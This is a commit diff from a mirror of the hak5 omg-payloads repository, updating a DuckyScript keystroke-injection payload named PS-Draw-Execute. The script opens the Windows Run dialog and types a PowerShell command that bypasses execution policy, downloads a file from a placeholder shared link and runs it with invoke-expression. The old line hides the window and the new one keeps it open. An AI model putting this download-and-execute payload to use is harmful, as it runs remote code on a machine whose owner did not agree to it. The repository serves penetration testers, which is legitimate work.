mirror of https://github.com/hak5/omg-payloads.git
Update PS-Draw-Execute
parent
7d5278c308
commit
e35fc2e8b3
|
@ -5,5 +5,5 @@ REM Download one of the two PS-Draw Execute files provided and execute it
|
|||
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
|
||||
STRING powershell -NoExit -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
|
||||
ENTER
|
||||
|
|
Loading…
Reference in New Issue